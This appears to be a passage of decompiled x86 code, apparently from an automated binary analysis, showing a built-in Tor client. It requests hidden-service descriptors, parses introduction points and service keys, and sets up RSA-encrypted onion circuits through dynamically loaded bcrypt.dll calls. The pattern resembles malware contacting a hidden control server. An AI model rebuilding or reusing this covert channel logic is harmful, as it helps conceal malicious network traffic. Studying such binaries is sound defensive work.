                            													E00403892(_t929,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x200)),  *((intOrPtr*)(_t964 - 0x1f8)), 0, _t942 + 5, 0,  *((intOrPtr*)(_t964 - 0x230)));
                            													E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            													_t660 = E004047B4( *((intOrPtr*)(_t964 - 0x764)),  *(_t964 - 0x77c), 0x202,  *((intOrPtr*)(_t964 + 0x10)), 0x14);
                            													_t943 =  *(_t964 - 0x77c);
                            													__eflags = _t660;
                            													if(_t660 != 0) {
                            														goto L117;
                            													}
                            													__eflags = _t943[4] - 3;
                            													if(__eflags != 0) {
                            														goto L117;
                            													}
                            													_t583 = E00403913(_t929, __eflags,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1fc)),  *((intOrPtr*)(_t964 - 0x1f4)), 0,  &(_t943[5]), 1,  *((intOrPtr*)(_t964 - 0x22c)));
                            													__eflags = _t583;
                            													if(_t583 == 0) {
                            														goto L117;
                            													}
                            													__eflags = _t943[5] - 0x27;
                            													if(_t943[5] != 0x27) {
                            														goto L117;
                            													}
                            													while(1) {
                            														L116:
                            														 *(_t964 - 0x6a8) =  *(_t964 - 0x6a8) + 1;
                            														goto L118;
                            													}
                            												}
                            												 *(_t964 - 0x34) = 0;
                            												 *(_t964 - 0x14) = 2;
                            												 *(_t964 - 0x18) = 1;
                            												while(1) {
                            													__eflags =  *(_t964 - 0x34) - 2;
                            													if( *(_t964 - 0x34) >= 2) {
                            														break;
                            													}
                            													 *((char*)(_t964 - 0x61a)) =  *(_t964 - 0x34);
                            													E0040332E( *((intOrPtr*)(_t964 - 8)), _t964 - 0x61e, 5, _t964 - 0x632, 0, 0xffffffff);
                            													E0040332E( *((intOrPtr*)(_t964 - 8)), _t964 - 0x63c, 0x1e, _t964 - 0x619, 0, 0xffffffff);
                            													E004067E1(_t964 - 0x619, 0x14, _t964 - 0x605);
                            													E0040664B(_t964 - 0x6a4, _t964 - 0x24, 4);
                            													E0040664B(_t964 - 0x6a4, _t964 - 0x2c, 4);
                            													_t906 = 0;
                            													while(1) {
                            														__eflags =  *(_t964 - 0x2c);
                            														if( *(_t964 - 0x2c) <= 0) {
                            															break;
                            														}
                            														E0040664B(_t964 - 0x2c, _t964 - 0x24, 4);
                            														 *(_t964 - 0x24) =  *(_t964 - 0x24) >> 1;
                            														_t687 = E00403EA6(__eflags, E00403F5D( *((intOrPtr*)(_t964 - 0x23c)), _t906 +  *(_t964 - 0x24), 8), _t964 - 0x6d0, _t964 - 0x6e4, _t964 - 0x6f8, _t964 - 0x70c);
                            														 *(_t964 - 0x20) = 0;
                            														__eflags = _t687;
                            														if(_t687 != 0) {
                            															L62:
                            															__eflags =  *(_t964 - 0x20) - 1;
                            															if( *(_t964 - 0x20) != 1) {
                            																E0040664B(_t964 - 0x24, _t964 - 0x2c, 4);
                            															} else {
                            																_t906 = _t906 +  *(_t964 - 0x24) + 1;
                            																 *(_t964 - 0x2c) =  *(_t964 - 0x2c) -  *(_t964 - 0x24) + 1;
                            															}
                            															continue;
                            														}
                            														CryptStringToBinaryA( *(_t964 - 0x6d0), 0, 1, 0, _t964 - 0x1c, 0, 0);
                            														CryptStringToBinaryA( *(_t964 - 0x6d0), 0, 1, _t964 - 0x5a1, _t964 - 0x1c, 0, 0);
                            														_t926 = 0;
                            														while(1) {
                            															__eflags = _t926 - 0x14;
                            															if(_t926 >= 0x14) {
                            																goto L62;
                            															}
                            															_t750 =  *[ss:ecx+ebp-0x5a1];
                            															__eflags = _t750 -  *[ss:ecx+ebp-0x619];
                            															if(_t750 >  *[ss:ecx+ebp-0x619]) {
                            																goto L62;
                            															}
                            															__eflags = _t750 -  *[ss:ecx+ebp-0x619];
                            															if(_t750 !=  *[ss:ecx+ebp-0x619]) {
                            																 *(_t964 - 0x20) = 1;
                            															}
                            															_t926 = _t926 + 1;
                            														}
                            														goto L62;
                            													}
                            													 *(_t964 - 0x1c) = 0;
                            													while(1) {
                            														__eflags =  *(_t964 - 0x1c) - 3;
                            														if( *(_t964 - 0x1c) >= 3) {
                            															break;
                            														}
                            														_t692 = E00403F5D( *((intOrPtr*)(_t964 - 0x23c)), _t906, 8);
                            														_t906 = _t906 + 1;
                            														_t929 = _t692;
                            														__eflags = E00403EA6(__eflags, _t692, _t964 - 0x6d0, _t964 - 0x6e4, _t964 - 0x6f8, _t964 - 0x70c);
                            														if(__eflags != 0) {
                            															continue;
                            														}
                            														__eflags = E00403422(__eflags,  *((intOrPtr*)(_t964 - 8)),  *(_t964 - 4),  *((intOrPtr*)(_t964 - 0xc)),  *((intOrPtr*)(_t964 - 0x10)),  *((intOrPtr*)(_t964 + 0x10)),  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x6ec)),  *(_t964 - 0x714),  *((intOrPtr*)(_t964 - 0x6e4)),  *((intOrPtr*)(_t964 - 0x6f8)),  *((intOrPtr*)(_t964 - 0x6dc)),  *(_t964 - 0x6d0),  *(_t964 - 0x14), _t964 - 0x1f0, _t964 - 0x1ec, _t964 - 0x1e8, _t964 - 0x1e4, _t964 - 0x228);
                            														if(__eflags <= 0) {
                            															L88:
                            															E00403779( *((intOrPtr*)(_t964 - 0x764)),  *(_t964 - 0x77c),  *((intOrPtr*)(_t964 + 0x10)),  *(_t964 - 0x14));
                            															 *(_t964 - 0x14) =  *(_t964 - 0x14) + 1;
                            															 *(_t964 - 0x18) =  *(_t964 - 0x18) + 1;
                            															 *(_t964 - 0x1c) =  *(_t964 - 0x1c) + 1;
                            															_t583 = E004069DA(__eflags,  *((intOrPtr*)(_t964 - 0x780)), 0x186a0, "-----END MESSAGE-----");
                            															__eflags = _t583;
                            															if(_t583 != 0) {
                            																 *(_t964 - 0x30) = _t583;
                            																goto L116;
                            															}
                            															continue;
                            														}
                            														E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            														_t944 =  *((intOrPtr*)(_t964 - 0x780));
                            														 *_t944 = 0x80;
                            														 *((char*)(_t944 + 3)) =  *(_t964 - 0x14);
                            														 *((char*)(_t944 + 4)) = 3;
                            														 *((char*)(_t944 + 5)) = 0xd;
                            														 *((char*)(_t944 + 9)) =  *(_t964 - 0x18);
                            														E00403892(_t929,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1f0)),  *((intOrPtr*)(_t964 - 0x1e8)), 0, _t944 + 5, 0,  *((intOrPtr*)(_t964 - 0x220)));
                            														E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            														_t712 = E004047B4( *((intOrPtr*)(_t964 - 0x764)),  *(_t964 - 0x77c), 0x202,  *((intOrPtr*)(_t964 + 0x10)), 0x14);
                            														_t945 =  *(_t964 - 0x77c);
                            														__eflags = _t712;
                            														if(_t712 != 0) {
                            															goto L117;
                            														}
                            														__eflags = _t945[4] - 3;
                            														if(__eflags != 0) {
                            															goto L88;
                            														}
                            														_t714 = E00403913(_t929, __eflags,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1ec)),  *((intOrPtr*)(_t964 - 0x1e4)), 0,  &(_t945[5]), 1,  *((intOrPtr*)(_t964 - 0x21c)));
                            														__eflags = _t714;
                            														if(_t714 == 0) {
                            															goto L117;
                            														}
                            														__eflags = _t945[5] - 4;
                            														if(__eflags != 0) {
                            															goto L88;
                            														}
                            														E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            														_t946 =  *((intOrPtr*)(_t964 - 0x780));
                            														 *_t946 = 0x80;
                            														 *((char*)(_t946 + 3)) =  *(_t964 - 0x14);
                            														 *((char*)(_t946 + 4)) = 3;
                            														 *((char*)(_t946 + 5)) = 2;
                            														 *((char*)(_t946 + 9)) =  *(_t964 - 0x18);
                            														_t720 = wsprintfA(_t946 + 0x10, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n", _t964 - 0x605,  *((intOrPtr*)(_t964 - 0x6e4)));
                            														_t966 = _t966 + 0x10;
                            														_t721 = _t720 + 1;
                            														__eflags = _t721;
                            														 *(_t946 + 0xf) = _t721;
                            														E00403892(_t929,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1f0)),  *((intOrPtr*)(_t964 - 0x1e8)), 0, _t946 + 5, 1,  *((intOrPtr*)(_t964 - 0x220)));
                            														E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            														 *(_t964 - 0x24) = 0;
                            														 *(_t964 - 0x2c) = 2;
                            														 *(_t964 - 0x30) = 0;
                            														_t960 =  *(_t964 - 0x77c);
                            														_t947 =  *((intOrPtr*)(_t964 - 0x780));
                            														E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            														while(1) {
                            															E00406698( *((intOrPtr*)(_t964 - 0x764)), 0, _t964 - 0x778, 0xa, 0);
                            															_push(_t964 - 0x76c);
                            															_push(0);
                            															_push(0);
                            															_t729 = _t964 - 0x778;
                            															_push(_t729);
                            															_push(0);
                            															L0040717E();
                            															__eflags = _t729;
                            															if(_t729 < 0) {
                            																goto L117;
                            															}
                            															__eflags = _t729;
                            															if(__eflags == 0) {
                            																goto L88;
                            															}
                            															_t732 = E004045B9(__eflags,  *((intOrPtr*)(_t964 - 0x764)), _t964 - 0x760,  *((intOrPtr*)(_t964 + 0x10)));
                            															__eflags = _t732;
                            															if(_t732 <= 0) {
                            																goto L117;
                            															}
                            															_t932 =  &(( *(_t964 - 0x77c))[ *(_t964 - 0x24)]);
                            															 *(_t964 - 0x24) =  *(_t964 - 0x24) + _t732;
                            															__eflags =  *(_t964 - 0x24) - 0x186a0;
                            															if( *(_t964 - 0x24) > 0x186a0) {
                            																goto L119;
                            															}
                            															E0040664B( *(_t964 - 0x760), _t932, _t732);
                            															E004048E1(_t964 - 0x760);
                            															_t736 =  *(_t964 - 0x24);
                            															_t737 = _t736 / 0x202;
                            															_t929 = _t736 % 0x202;
                            															__eflags = _t736 % 0x202;
                            															if(_t736 % 0x202 != 0) {
                            																continue;
                            															}
                            															 *(_t964 - 0x28) = _t737;
                            															while(1) {
                            																__eflags =  *(_t964 - 0x28);
                            																if( *(_t964 - 0x28) <= 0) {
                            																	break;
                            																}
                            																__eflags =  *_t960 - 0x80;
                            																if(__eflags != 0) {
                            																	L85:
                            																	_t960 =  &(_t960[0x202]);
                            																	_t426 = _t964 - 0x28;
                            																	 *_t426 =  *(_t964 - 0x28) - 1;
                            																	__eflags =  *_t426;
                            																	continue;
                            																}
                            																_t742 = E00403913(_t929, __eflags,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1ec)),  *((intOrPtr*)(_t964 - 0x1e4)), 0,  &(_t960[5]),  *(_t964 - 0x2c),  *((intOrPtr*)(_t964 - 0x21c)));
                            																__eflags = _t742;
                            																if(_t742 == 0) {
                            																	goto L117;
                            																}
                            																__eflags = _t960[4] - 0x503;
                            																if(_t960[4] == 0x503) {
                            																	goto L85;
                            																}
                            																__eflags = _t960[4] - 0x203;
                            																if(__eflags != 0) {
                            																	goto L88;
                            																}
                            																_t923 = _t960[0xe];
                            																E0040664B( &(_t960[0x10]), _t947, _t923);
                            																_t947 = _t947 + _t923;
                            																_t424 = _t964 - 0x2c;
                            																 *_t424 =  *(_t964 - 0x2c) + 1;
                            																__eflags =  *_t424;
                            																goto L85;
                            															}
                            														}
                            														goto L117;
                            													}
                            													_t441 = _t964 - 0x34;
                            													 *_t441 =  *(_t964 - 0x34) + 1;
                            													__eflags =  *_t441;
                            												}
                            											} else {
                            												_t752 = E004069DA(__eflags,  *((intOrPtr*)(_t964 - 0x780)), 0x186a0, "-----BEGIN MESSAGE-----") + 0x17;
                            												 *(_t964 - 0x30) =  *(_t964 - 0x30) - _t752;
                            												_t948 =  *(_t964 - 0x77c);
                            												while(1) {
                            													__eflags =  *(_t964 - 0x30);
                            													if( *(_t964 - 0x30) <= 0) {
                            														break;
                            													}
                            													asm("lodsb");
                            													__eflags = _t752 - 0x20;
                            													if(_t752 > 0x20) {
                            														asm("stosb");
                            													}
                            													_t27 = _t964 - 0x30;
                            													 *_t27 =  *(_t964 - 0x30) - 1;
                            													__eflags =  *_t27;
                            												}
                            												 *_t948 = 0;
                            												CryptStringToBinaryA( *(_t964 - 0x77c), 0, 1, 0, _t964 - 0x1c, 0, 0);
                            												_t756 = E004048B6( *(_t964 - 0x1c), _t964 - 0x784);
                            												__eflags = _t756;
                            												if(_t756 == 0) {
                            													break;
                            												}
                            												CryptStringToBinaryA( *(_t964 - 0x77c), 0, 1,  *(_t964 - 0x784), _t964 - 0x1c, 0, 0);
                            												_t949 =  *(_t964 - 0x784);
                            												_t907 = 0;
                            												while(1) {
                            													__eflags = _t907 - 3;
                            													if(_t907 >= 3) {
                            														break;
                            													}
                            													__eflags =  *(_t964 - 0x1c);
                            													if(__eflags > 0) {
                            														_t895 = E004069A0(__eflags, _t949,  *(_t964 - 0x1c), "introduction-point");
                            														__eflags = _t895;
                            														if(__eflags == 0) {
                            															break;
                            														}
                            														 *(_t964 + _t907 * 4 - 0x72c) = _t895;
                            														_t896 = E004069A0(__eflags, _t949,  *(_t964 - 0x1c), "ip-address");
                            														__eflags = _t896;
                            														if(__eflags == 0) {
                            															goto L119;
                            														}
                            														 *(_t964 + _t907 * 4 - 0x738) = _t896;
                            														_t897 = E004069A0(__eflags, _t949,  *(_t964 - 0x1c), "onion-port");
                            														__eflags = _t897;
                            														if(__eflags == 0) {
                            															goto L119;
                            														}
                            														 *(_t964 + _t907 * 4 - 0x744) = _t897;
                            														_t898 = E004069DA(__eflags, _t949,  *(_t964 - 0x1c), "service-key");
                            														__eflags = _t898;
                            														if(__eflags == 0) {
                            															goto L119;
                            														}
                            														_t900 = _t898 + 1 - _t949;
                            														_t949 =  &(_t949[_t900]);
                            														 *(_t964 - 0x1c) =  *(_t964 - 0x1c) - _t900;
                            														_t901 = E004069DA(__eflags, _t949,  *(_t964 - 0x1c), "KEY-----");
                            														__eflags = _t901;
                            														if(__eflags == 0) {
                            															goto L119;
                            														}
                            														 *((intOrPtr*)(_t964 + _t907 * 4 - 0x750)) = _t901 + 8;
                            														_t903 = E004069DA(__eflags, _t949,  *(_t964 - 0x1c), "-----END");
                            														__eflags = _t903;
                            														if(_t903 == 0) {
                            															goto L119;
                            														}
                            														 *_t903 = 0;
                            														_t907 = _t907 + 1;
                            														__eflags = _t907;
                            														continue;
                            													}
                            													break;
                            												}
                            												while(1) {
                            													__eflags = _t907;
                            													if(__eflags <= 0) {
                            														break;
                            													}
                            													_t907 = _t907 - 1;
                            													_t764 = E00403422(__eflags,  *((intOrPtr*)(_t964 - 8)),  *(_t964 - 4),  *((intOrPtr*)(_t964 - 0xc)),  *((intOrPtr*)(_t964 - 0x10)),  *((intOrPtr*)(_t964 + 0x10)),  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x6ec)),  *(_t964 - 0x714),  *(_t964 + _t907 * 4 - 0x738),  *(_t964 + _t907 * 4 - 0x744),  *((intOrPtr*)(_t964 - 0x6dc)),  *(_t964 + _t907 * 4 - 0x72c),  *(_t964 - 0x14), _t964 - 0x1e0, _t964 - 0x1dc, _t964 - 0x1d8, _t964 - 0x1d4, _t964 - 0x218);
                            													__eflags = _t764;
                            													if(_t764 <= 0) {
                            														L43:
                            														E00403779( *((intOrPtr*)(_t964 - 0x764)),  *(_t964 - 0x77c),  *((intOrPtr*)(_t964 + 0x10)),  *(_t964 - 0x14));
                            														_t217 = _t964 - 0x14;
                            														 *_t217 =  *(_t964 - 0x14) + 1;
                            														__eflags =  *_t217;
                            														continue;
                            													}
                            													_t800 = E00406A32(E004066D2(_t964 - 0x63c, 0x400), 0x100);
                            													asm("stosb");
                            													asm("loop 0xfffffff5");
                            													 *((char*)(_t964 - 0x42a)) = 2;
                            													_push( *((intOrPtr*)(_t964 - 0x6e0)));
                            													L00407166();
                            													 *((intOrPtr*)(_t964 - 0x429)) = _t800;
                            													_t801 = E00406663( *((intOrPtr*)(_t964 - 0x6f4)));
                            													 *((char*)(_t964 - 0x425)) = _t801;
                            													 *((char*)(_t964 - 0x424)) = _t801;
                            													CryptStringToBinaryA( *(_t964 - 0x6d4), 0, 1, 0, _t964 - 0x24, 0, 0);
                            													CryptStringToBinaryA( *(_t964 - 0x6d4), 0, 1, _t964 - 0x423, _t964 - 0x24, 0, 0);
                            													_t809 = E00404065(_t929, __eflags,  *((intOrPtr*)(_t964 - 0x6ec)),  *(_t964 - 0x714), _t964 - 0x423, _t964 - 0x40d);
                            													__eflags = _t809;
                            													if(_t809 == 0) {
                            														L117:
                            														_t583 = E00406474( *((intOrPtr*)(_t964 + 0x10)),  *((intOrPtr*)(_t964 + 0x14)),  *((intOrPtr*)(_t964 - 0x764)));
                            														 *(_t964 - 0x6a8) = 0;
                            														goto L118;
                            													}
                            													 *(_t964 - 0x40f) = _t809;
                            													 *(_t964 - 0x40e) = _t809;
                            													E0040664B(_t964 - 0x650, _t964 - 0x381, 0x14);
                            													 *((char*)(_t964 - 0x1c4)) = 7;
                            													 *((char*)(_t964 - 0x1c3)) = 2;
                            													 *((short*)(_t964 - 0x1c2)) = 0;
                            													 *((intOrPtr*)(_t964 - 0x1c0)) = 0xaa02;
                            													 *((intOrPtr*)(_t964 - 0x1bc)) = 0x32484400;
                            													 *(_t964 - 0x1b8) = 0x400;
                            													E00406A32(E0040664B(0x409450, _t964 - 0x1b4, 0x80), 0x100);
                            													asm("stosb");
                            													asm("loop 0xfffffff5");
                            													E004066D2(_t964 - 0x134, 0x80);
                            													 *((char*)(_t964 - 0x134)) = 2;
                            													E00403E30( *(_t964 - 4), _t964 - 0x1c4, _t964 - 0x36d);
                            													_t955 = _t964 - 0x5b0;
                            													_t821 = 1;
                            													while(1) {
                            														_t821 = _t821;
                            														__eflags = _t821;
                            														if(_t821 == 0) {
                            															break;
                            														}
                            														asm("lodsb");
                            														__eflags = _t821 - 0x20;
                            														if(_t821 > 0x20) {
                            															asm("stosb");
                            														}
                            													}
                            													 *_t955 = 0;
                            													CryptStringToBinaryA(_t964 - 0x5b0, 0, 1, 0, _t964 - 0x20, 0, 0);
                            													CryptStringToBinaryA(_t964 - 0x5b0, 0, 1, _t964 - 0x63c, _t964 - 0x20, 0, 0);
                            													 *(_t964 - 0x24) = 0x94;
                            													E004066D2(_t964 - 0x5b0, 0x94);
                            													_push(_t964 - 0x24);
                            													_push(_t964 - 0x5b0);
                            													_push(0);
                            													_push(0x8c);
                            													_push(_t964 - 0x63c);
                            													_push(0x13);
                            													_push(1);
                            													L00407208();
                            													 *((intOrPtr*)(_t964 - 0x51c)) = 0x31415352;
                            													 *(_t964 - 0x518) = 0x400;
                            													 *(_t964 - 0x514) = 4;
                            													 *((intOrPtr*)(_t964 - 0x510)) = 0x80;
                            													 *(_t964 - 0x50c) = 0;
                            													 *(_t964 - 0x508) = 0;
                            													asm("bswap eax");
                            													 *((intOrPtr*)(_t964 - 0x504)) =  *((intOrPtr*)(_t964 - 0x5a0));
                            													E00406605(_t964 - 0x51d, _t964 - 0x500, 0x80);
                            													_push(0);
                            													_push(0x9c);
                            													_push(_t964 - 0x51c);
                            													_push(_t964 - 0x1c8);
                            													_push(L"RSAPUBLICBLOB");
                            													_push(0);
                            													_push( *((intOrPtr*)(_t964 - 0xc)));
                            													 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptImportKeyPair")))();
                            													E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            													_t956 =  *((intOrPtr*)(_t964 - 0x780));
                            													 *_t956 = 0x80;
                            													 *((char*)(_t956 + 3)) =  *(_t964 - 0x14);
                            													 *((char*)(_t956 + 4)) = 3;
                            													 *((char*)(_t956 + 5)) = 0x22;
                            													 *((char*)(_t956 + 0xe)) = 0x18b;
                            													 *((char*)(_t956 + 0xf)) = 0x18b;
                            													E0040332E( *((intOrPtr*)(_t964 - 8)), _t964 - 0x63c, 0x8c, _t956 + 0x10, 0, 0xffffffff);
                            													 *((intOrPtr*)(_t964 - 0x75c)) = L"SHA1";
                            													 *(_t964 - 0x758) = 0;
                            													 *(_t964 - 0x754) = 0;
                            													_push(4);
                            													_push(_t964 - 0x2c);
                            													_push(0x80);
                            													_push(_t956 + 0x24);
                            													_push(0);
                            													_push(0);
                            													_push(_t964 - 0x75c);
                            													_push(0x56);
                            													_push(_t964 - 0x43a);
                            													_push( *((intOrPtr*)(_t964 - 0x1c8)));
                            													 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptEncrypt")))();
                            													E004064D6(_t964 - 0x1c8, _t964 - 0x1c8, 0, 1);
                            													 *((intOrPtr*)(_t964 - 0x51c)) = 0x4d42444b;
                            													 *(_t964 - 0x518) = 1;
                            													 *(_t964 - 0x514) = 0x10;
                            													E0040664B(_t964 - 0x43a, _t964 - 0x510, 0x10);
                            													_push(0);
                            													_push(0x1c);
                            													_push(_t964 - 0x51c);
                            													_push(0);
                            													_push(0);
                            													_push(_t964 - 0x1c8);
                            													_push(L"KeyDataBlob");
                            													_push(0);
                            													_push( *((intOrPtr*)(_t964 - 0x10)));
                            													 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptImportKey")))();
                            													E0040664B(_t964 - 0x3e4, _t956 + 0xa4, 0xf7);
                            													E004037B8(__eflags,  *((intOrPtr*)(_t964 - 0x1c8)), _t956 + 0xa4, 0xf7, 0);
                            													E004064D6(_t964 - 0x1c8, _t964 - 0x1c8, 0, 1);
                            													E00403892(_t929,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1e0)),  *((intOrPtr*)(_t964 - 0x1d8)), 0, _t956 + 5, 0,  *((intOrPtr*)(_t964 - 0x210)));
                            													E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            													_t879 = E004047B4( *((intOrPtr*)(_t964 - 0x764)),  *(_t964 - 0x77c), 0x404,  *((intOrPtr*)(_t964 + 0x10)), 0x64);
                            													_t957 =  *(_t964 - 0x77c);
                            													__eflags = _t879;
                            													if(_t879 != 0) {
                            														goto L117;
                            													}
                            													__eflags = _t957[4] - 3;
                            													if(__eflags != 0) {
                            														goto L119;
                            													}
                            													_t881 = E00403913(_t929, __eflags,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1dc)),  *((intOrPtr*)(_t964 - 0x1d4)), 0,  &(_t957[5]), 1,  *((intOrPtr*)(_t964 - 0x20c)));
                            													__eflags = _t881;
                            													if(_t881 == 0) {
                            														goto L117;
                            													}
                            													__eflags = _t957[5] - 0x28;
                            													if(__eflags != 0) {
                            														goto L119;
                            													}
                            													_t883 = E00403913(_t929, __eflags,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1fc)),  *((intOrPtr*)(_t964 - 0x1f4)), 0,  &(_t957[0x207]), 2,  *((intOrPtr*)(_t964 - 0x22c)));
                            													__eflags = _t883;
                            													if(_t883 == 0) {
                            														goto L117;
                            													}
                            													E00406605( &(_t957[0x291]), _t964 - 0x134, 0x80);
                            													_t893 = E004039AA(__eflags,  *(_t964 - 4),  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x10)), _t964 - 0x1c4,  &(_t957[0x292]), _t964 - 0x1d0, _t964 - 0x1cc, _t964 - 0x208, _t964 - 0x204);
                            													__eflags = _t893;
                            													if(_t893 == 0) {
                            														goto L117;
                            													}
                            													_t907 = 0xffffffff;
                            													goto L43;
                            												}
                            												__eflags = _t907;
                            												if(_t907 >= 0) {
                            													break;
                            												}
                            												E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            												_t950 =  *((intOrPtr*)(_t964 - 0x780));
                            												 *_t950 = 0x80;
                            												 *((char*)(_t950 + 3)) = 1;
                            												 *((char*)(_t950 + 4)) = 3;
                            												 *((char*)(_t950 + 5)) = 1;
                            												 *((char*)(_t950 + 9)) =  *(_t964 - 0x18);
                            												 *((char*)(_t950 + 0xf)) = 0x12;
                            												E004066E9( *((intOrPtr*)(_t964 + 8)), 0xa, _t964 - 0x6c8);
                            												E004067E1(_t964 - 0x6c8, 0xa, _t950 + 0x10);
                            												 *((char*)(_t950 + 0x20)) = 0x3a;
                            												E004066E9( *((intOrPtr*)(_t964 + 0xc)), 0xffffffff, _t964 - 0x720);
                            												 *((intOrPtr*)(_t950 + 0xf)) =  *((intOrPtr*)(_t950 + 0xf)) + E0040690B(__eflags, _t964 - 0x720);
                            												E0040664B(_t964 - 0x720, _t950 + 0x21, _t776);
                            												E00403892(_t929,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x200)),  *((intOrPtr*)(_t964 - 0x1f8)),  *((intOrPtr*)(_t964 - 0x1d0)), _t950 + 5, 1,  *((intOrPtr*)(_t964 - 0x208)));
                            												E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            												_t783 = E004047B4( *((intOrPtr*)(_t964 - 0x764)),  *(_t964 - 0x77c), 0x202,  *((intOrPtr*)(_t964 + 0x10)), 0x64);
                            												_t951 =  *(_t964 - 0x77c);
                            												__eflags = _t783;
                            												if(_t783 != 0) {
                            													goto L117;
                            												}
                            												__eflags = _t951[4] - 3;
                            												if(__eflags != 0) {
                            													goto L117;
                            												}
                            												_t785 = E00403913(_t929, __eflags,  *((intOrPtr*)(_t964 - 8)),  *((intOrPtr*)(_t964 - 0x1fc)),  *((intOrPtr*)(_t964 - 0x1f4)),  *((intOrPtr*)(_t964 - 0x1cc)),  &(_t951[5]), 3,  *((intOrPtr*)(_t964 - 0x204)));
                            												__eflags = _t785;
                            												if(_t785 == 0) {
                            													goto L117;
                            												}
                            												__eflags = _t951[5] - 4;
                            												if(_t951[5] == 4) {
                            													E0040664B(_t964 - 8,  *((intOrPtr*)(_t964 + 0x1c)), 4);
                            													E0040664B(_t964 - 0x200,  *((intOrPtr*)(_t964 + 0x20)), 0x10);
                            													E0040664B(_t964 - 0x1d0,  *((intOrPtr*)(_t964 + 0x20)) + 0x10, 8);
                            													E0040664B(_t964 - 0x208,  *((intOrPtr*)(_t964 + 0x24)), 8);
                            													E0040664B(_t964 - 0x18,  *((intOrPtr*)(_t964 + 0x28)), 4);
                            													 *(_t964 - 0x788) = 1;
                            												}
                            											}
                            											break;
                            										}
                            										__eflags =  *(_t964 - 0x714);
                            										if( *(_t964 - 0x714) == 0) {
                            											continue;
                            										}
                            										goto L12;
                            									}
                            									__eflags = _t583 - 0x1f;
                            									if(__eflags != 0) {
                            										continue;
                            									}
                            									goto L9;
                            								}
                            								__eflags = _t583 - 0x17;
                            								if(_t583 != 0x17) {
                            									continue;
                            								}
                            								goto L7;
                            							}
                            							__eflags = _t583 - 7;
                            							if(_t583 != 7) {
                            								continue;
                            							}
                            							goto L5;
                            						}
                            						__eflags = _t583 - 7;
                            						if(_t583 != 7) {
                            							continue;
                            						}
                            						goto L3;
                            					}
                            					L119:
                            					 *(_t964 - 0x24) = 0xc;
                            					if( *(_t964 - 0x788) != 1) {
                            						 *(_t964 - 0x24) = 0xe;
                            					}
                            					E00406517(_t964 - 0x238, _t964 - 0x238, 0,  *(_t964 - 0x24));
                            					 *(_t964 - 0x24) = 8;
                            					 *(_t964 - 0x2c) = 4;
                            					if( *(_t964 - 0x788) != 1) {
                            						 *(_t964 - 0x24) = 0xe;
                            						 *(_t964 - 0x2c) = 0;
                            					}
                            					E004064D6(_t964 - 0x200, _t964 - 0x200,  *(_t964 - 0x2c),  *(_t964 - 0x24));
                            					CryptReleaseContext( *(_t964 - 4), 0);
                            					_t971 =  *(_t964 - 0x788) - 1;
                            					if( *(_t964 - 0x788) != 1) {
                            						_push(0);
                            						_push( *((intOrPtr*)(_t964 - 8)));
                            						 *((intOrPtr*)(E00406EE2(_t971, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            					}
                            					_push(0);
                            					_push( *((intOrPtr*)(_t964 - 0xc)));
                            					 *((intOrPtr*)(E00406EE2(_t971, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            					_push(0);
                            					_push( *((intOrPtr*)(_t964 - 0x10)));
                            					 *((intOrPtr*)(E00406EE2(_t971, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            					E0040664B(_t964 - 0x764,  *((intOrPtr*)(_t964 + 0x18)), 4);
                            					E004048E1(_t964 - 0x23c);
                            					E004048E1(_t964 - 0x784);
                            					E004048E1(_t964 - 0x77c);
                            					E004048E1(_t964 - 0x780);
                            					return  *(_t964 - 0x788);
                            				}
                            			}









































































                            0x00402621
                            0x00402621
                            0x00402621
                            0x00000000
                            0x00402644
                            0x00401416
                            0x00401419
                            0x0040141e
                            0x00401425
                            0x00401430
                            0x00401430
                            0x00401437
                            0x00401442
                            0x00401442
                            0x00401449
                            0x00401454
                            0x00401454
                            0x0040145b
                            0x00401466
                            0x0040148d
                            0x00401492
                            0x00401492
                            0x00401494
                            0x00000000
                            0x00000000
                            0x0040149a
